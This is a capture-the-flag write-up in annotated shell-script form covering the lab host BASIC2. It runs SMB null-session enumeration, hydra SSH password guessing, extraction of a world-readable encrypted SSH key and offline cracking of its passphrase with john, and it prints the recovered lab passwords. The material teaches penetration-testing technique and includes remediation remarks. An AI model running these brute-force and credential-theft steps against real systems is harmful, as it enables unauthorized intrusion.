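# CTF write-up by ariafatah -- target host "BASIC2" (Samba 4.3.11 / Apache 2.4.18 / OpenSSH 7.2p2 / Tomcat 9.0.7).
# Attack chain: SMB null session -> local user enumeration -> SSH password guessing (jan)
#               -> world-readable, passphrase-protected SSH key of kay -> offline passphrase crack
#               -> key login as kay -> pass.bak.
# The first line of the original file was bare prose, which a shell would try to execute; it is a comment now.
: '[+] setup'
# Target address; every command below reads "$ip".
ip=10.10.207.200
# Attacker-side VPN (tun0) address, kept for listeners / reverse shells; not needed on this path.
tun=10.21.78.122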
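: '[+] nmap'
# Default-script (-sC) + version (-sV) scan of the top 1000 TCP ports, saved as "nmap" (-oN).
# -T4 is fine on a lab VPN; it is noisy on a real engagement. NOTE: this does NOT cover all
# 65535 ports -- run a follow-up `nmap -p- -T4 "$ip"` before treating the surface below as complete.
nmap -sC -sV -T4 -oN nmap "$ip"
# Nmap 7.94SVN scan initiated Sat Feb 1 19:47:01 2025 as: /usr/lib/nmap/nmap --privileged -sCV -T4 -oN nmap 10.10.207.200
# Nmap scan report for 10.10.207.200 (10.10.207.200)
# Host is up (0.21s latency).
# Not shown: 994 closed tcp ports (reset)
# PORT STATE SERVICE VERSION
# 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
# | ssh-hostkey:
# | 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
# | 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
# |_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
# 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
# |_http-title: Site doesn't have a title (text/html).
# |_http-server-header: Apache/2.4.18 (Ubuntu)
# 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
# 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
# 8009/tcp open ajp13?
# | ajp-methods:
# |_ Supported methods: GET HEAD POST OPTIONS
# 8080/tcp open http-proxy
# |_http-open-proxy: Proxy might be redirecting requests
# |_http-title: Apache Tomcat/9.0.7
# | fingerprint-strings:
# | giop:
# | HTTP/1.1 400
# | Content-Type: text/html;charset=utf-8
# | Content-Language: en
# | Content-Length: 2243
# | Date: Sat, 01 Feb 2025 12:49:52 GMT
# | Connection: close
# | <!doctype html><html lang="en"><head><title>HTTP Status 400
# |_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
# |_http-favicon: Apache Tomcat
# 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
# SF-Port8080-TCP:V=7.94SVN%I=7%D=2/1%Time=679E1871%P=x86_64-pc-linux-gnu%r(
# SF:giop,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=ut
# SF:f-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20S
# SF:at,\x2001\x20Feb\x202025\x2012:49:52\x20GMT\r\nConnection:\x20close\r\n
# SF:\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\
# SF:x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/c
# SF:ss\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-
# SF:color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-
# SF:serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{f
# SF:ont-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76
# SF:;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color
# SF::black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-
# SF:serif;color:white;background-color:#525D76;}\x20p\x20{font-family:Tahom
# SF:a,Arial,sans-serif;background:white;color:black;font-size:12px;}\x20a\x
# SF:20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;
# SF:background-color:#525D76;border:none;}</style></head><bod");
# Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Host script results:
# |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
# | smb2-time:
# | date: 2025-02-01T12:49:54
# |_ start_date: N/A
# | smb-os-discovery:
# | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
# | Computer name: basic2
# | NetBIOS computer name: BASIC2\x00
# | Domain name: \x00
# | FQDN: basic2
# |_ System time: 2025-02-01T07:49:54-05:00
# |_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
# | smb2-security-mode:
# | 3:1:1:
# |_ Message signing enabled but not required
# | smb-security-mode:
# | account_used: guest
# | authentication_level: user
# | challenge_response: supported
# |_ message_signing: disabled (dangerous, but default)
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# # Nmap done at Sat Feb 1 19:50:01 2025 -- 1 IP address (1 host up) scanned in 179.81 seconds
#
# Takeaways that drive the rest of the write-up:
#  - 139/445: Samba 4.3.11, guest account accepted and SMB signing not required -> null-session
#    enumeration with enum4linux (signing-not-required also means SMB relay would be possible
#    in a real network; not relevant on this single host).
#  - 22: OpenSSH 7.2p2; password authentication turns out to be enabled (jan is guessed online below).
#  - 8009/8080: Tomcat 9.0.7 with the AJP connector reachable from the network. That is an old
#    9.0.x release with AJP exposed, worth a separate look (the Ghostcat AJP file-read class,
#    CVE-2020-1938) -- not needed for the path taken here.
#  - 80: bare Apache 2.4.18, no title -> directory brute force.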
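: '[+] whatweb'
# Quick fingerprint of the default vhost. Only the Apache/2.4.18 banner comes back -- no
# framework or CMS hint -- so the next step is content discovery rather than a known-CMS exploit.
whatweb "$ip"
# http://10.10.207.200 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.207.200]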
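: '[+] Directory Discovery (gobuster, dirsearch, dirbuster(gui))'
# Directory brute force with the small dirbuster list; the hit list is saved (-o) so it is not
# lost when the terminal scrolls. /development is the only result on this list -- a larger list
# and a file-extension pass (-x php,txt,bak) would be the normal follow-up on a real target.
gobuster dir -u "http://$ip" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o gobuster.txt
# /development (Status: 301) [Size: 318] [--> http://10.10.207.200/development/]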
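: '[+] enum4linux'
# Full (-a) null-session enumeration over SMB; output is both shown and kept in "enum" via tee.
# Everything below is obtained with an empty username and empty password, i.e. no credentials.
enum4linux -a "$ip" | tee enum
# Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Feb 1 19:54:45 2025
# =========================================( Target Information )=========================================
# Target ........... 10.10.207.200
# RID Range ........ 500-550,1000-1050
# Username ......... ''
# Password ......... ''
# Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
# ============================( Enumerating Workgroup/Domain on 10.10.207.200 )============================
# [+] Got domain/workgroup name: WORKGROUP
# ================================( Nbtstat Information for 10.10.207.200 )================================
# Looking up status of 10.10.207.200
# BASIC2 <00> - B <ACTIVE> Workstation Service
# BASIC2 <03> - B <ACTIVE> Messenger Service
# BASIC2 <20> - B <ACTIVE> File Server Service
# ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
# WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
# WORKGROUP <1d> - B <ACTIVE> Master Browser
# WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
# MAC Address = 00-00-00-00-00-00
# ===================================( Session Check on 10.10.207.200 )===================================
# [+] Server 10.10.207.200 allows sessions using username '', password ''
# ================================( Getting domain SID for 10.10.207.200 )================================
# Domain Name: WORKGROUP
# Domain Sid: (NULL SID)
# [+] Can't determine if host is part of domain or part of a workgroup
# ===================================( OS information on 10.10.207.200 )===================================
# [E] Can't get OS info with smbclient
# [+] Got OS info for 10.10.207.200 from srvinfo:
# BASIC2 Wk Sv PrQ Unx NT SNT Samba Server 4.3.11-Ubuntu
# platform_id : 500
# os version : 6.1
# server type : 0x809a03
# =======================================( Users on 10.10.207.200 )=======================================
# Use of uninitialized value $users in print at ./enum4linux.pl line 972.
# Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.
# Use of uninitialized value $users in print at ./enum4linux.pl line 986.
# Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.
# (The Perl warnings above are enum4linux failing to parse an empty user list from querydispinfo;
#  the users are still recovered by RID cycling further down.)
# =================================( Share Enumeration on 10.10.207.200 )=================================
# Sharename Type Comment
# --------- ---- -------
# Anonymous Disk
# IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
# Reconnecting with SMB1 for workgroup listing.
# Server Comment
# --------- -------
# Workgroup Master
# --------- -------
# WORKGROUP BASIC2
# [+] Attempting to map shares on 10.10.207.200
# //10.10.207.200/Anonymous Mapping: OK Listing: OK Writing: N/A
# [E] Can't understand response:
# NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
# //10.10.207.200/IPC$ Mapping: N/A Listing: N/A Writing: N/A
# ============================( Password Policy Information for 10.10.207.200 )============================
# [+] Attaching to 10.10.207.200 using a NULL share
# [+] Trying protocol 139/SMB...
# [+] Found domain(s):
# [+] BASIC2
# [+] Builtin
# [+] Password Info for Domain: BASIC2
# [+] Minimum password length: 5
# [+] Password history length: None
# [+] Maximum password age: 37 days 6 hours 21 minutes
# [+] Password Complexity Flags: 000000
# [+] Domain Refuse Password Change: 0
# [+] Domain Password Store Cleartext: 0
# [+] Domain Password Lockout Admins: 0
# [+] Domain Password No Clear Change: 0
# [+] Domain Password No Anon Change: 0
# [+] Domain Password Complex: 0
# [+] Minimum password age: None
# [+] Reset Account Lockout Counter: 30 minutes
# [+] Locked Account Duration: 30 minutes
# [+] Account Lockout Threshold: None
# [+] Forced Log off Time: 37 days 6 hours 21 minutes
# [+] Retieved partial password policy with rpcclient:
# Password Complexity: Disabled
# Minimum Password Length: 5
# =======================================( Groups on 10.10.207.200 )=======================================
# [+] Getting builtin groups:
# [+] Getting builtin group memberships:
# [+] Getting local groups:
# [+] Getting local group memberships:
# [+] Getting domain groups:
# [+] Getting domain group memberships:
# ==================( Users on 10.10.207.200 via RID cycling (RIDS: 500-550,1000-1050) )==================
# [I] Found new SID:
# S-1-22-1
# [I] Found new SID:
# S-1-5-32
# [I] Found new SID:
# S-1-5-32
# [I] Found new SID:
# S-1-5-32
# [I] Found new SID:
# S-1-5-32
# [+] Enumerating users using SID S-1-22-1 and logon username '', password ''
# S-1-22-1-1000 Unix User\kay (Local User)
# S-1-22-1-1001 Unix User\jan (Local User)
#
# Takeaways:
#  - Null session accepted; an "Anonymous" disk share is mappable and listable without credentials.
#  - RID cycling under S-1-22-1 (the Samba "Unix Users" authority) leaks the local accounts kay and jan.
#  - Password policy reported by Samba: minimum length 5, complexity disabled, lockout threshold None.
#    This is what makes the online SSH guessing below safe to run: no lockout, and short simple
#    passwords are allowed. (This is Samba's view of the policy; SSH/PAM may differ -- it did not here.)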
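: '[+] samba'
# Pull the one file from the Anonymous share over a null session. -N suppresses the password
# prompt (empty password), -c runs the smb commands non-interactively. The original line
# "> get staff.txt" was an interactive smbclient command pasted into the script; as shell it
# would redirect stdout to a file called "get" and try to execute "staff.txt".
smbclient -N "//$ip/Anonymous" -c 'ls; get staff.txt'
cat staff.txt
# Announcement to staff:
# PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
# this is how mistakes happen. (This means you too, Jan!)
# -Kay
# Two usernames fall out of a memo on an anonymous share -- "Kay" (author) and "Jan" -- and
# they match the kay/jan accounts found by RID cycling, so the usernames are confirmed before
# any password guessing starts.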
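: '[+] hydra'
# Online password guessing against SSH for jan. The original line had the command pasted twice
# on one line ("... -t 64hydra -l jan ... -t 6"), which is not a valid invocation; this is the
# intended single run. -t 4 is the parallelism hydra itself recommends for ssh -- higher counts
# (the original's 64) make sshd drop connections and silently miss valid passwords.
# Safe to run here because enum4linux reported "Account Lockout Threshold: None"; on a real
# target check the lockout policy first, or this locks the account out.
hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 4 "ssh://$ip"
# [22][ssh] host: 10.10.207.200 login: jan password: armando
# "armando" is a plain dictionary word, consistent with the min-length-5 / no-complexity policy seen above.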
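: '[+] linenum / linpeas (run ON THE TARGET as jan, after: ssh jan@$ip, password armando)'
# Both scripts have to be copied to the target first (scp, or python3 -m http.server + wget).
# The original "/linenum.sh" pointed at the filesystem root; the script sits in the current directory.
./linenum.sh
./linpeas.sh
# ╔══════════╣ Analyzing SSH Files (limit 70)
# -rw-r--r-- 1 kay kay 3326 Apr 19 2018 /home/kay/.ssh/id_rsa
# Finding: kay's private key is mode 0644 -- readable by every local user. It is passphrase
# protected (Proc-Type: 4,ENCRYPTED), but that only moves the problem to an offline crack
# of the passphrase, which is attacker-controlled time. Fix on the target side would be
# chmod 600 and a non-dictionary passphrase; the 2018 timestamp suggests the key was never rotated.
cat /home/kay/.ssh/id_rsa
# -----BEGIN RSA PRIVATE KEY-----
# Proc-Type: 4,ENCRYPTED
# DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
# IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
# ...
# 3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
# -----END RSA PRIVATE KEY-----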
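: '[+] john (back on the attacker box)'
# Copy the key out over jan's SSH access rather than pasting it from the terminal (a paste
# easily corrupts the base64 body). ssh refuses a private key the current user owns with
# group/other permissions, so set 0600 before using it with -i.
scp "jan@$ip:/home/kay/.ssh/id_rsa" ./id_rsa
chmod 600 id_rsa
# ssh2john turns the encrypted key into a hash john can attack offline; rockyou finds the passphrase.
ssh2john id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
# beeswax (id_rsa)
#
# "beeswax" is the KEY PASSPHRASE, not kay's account password, so switching user with it on the
# target fails -- the original write-up tried exactly that:
#   su kay
#   # Password:
#   # su: Authentication failure
# Authenticate with the key instead and give "beeswax" at the "Enter passphrase" prompt.
# (The original used "ssh -i .ssh/id_rsa kay@localhost" from jan's shell; that relative path
# resolves inside jan's home, where the key is not -- use the copied, chmod-600 file.)
ssh -i id_rsa "kay@$ip"
# Now running as kay on the target. pass.bak in kay's home holds the password in clear text --
# a backup file with a live credential is itself a finding, independent of the flag.
cat /home/kay/pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$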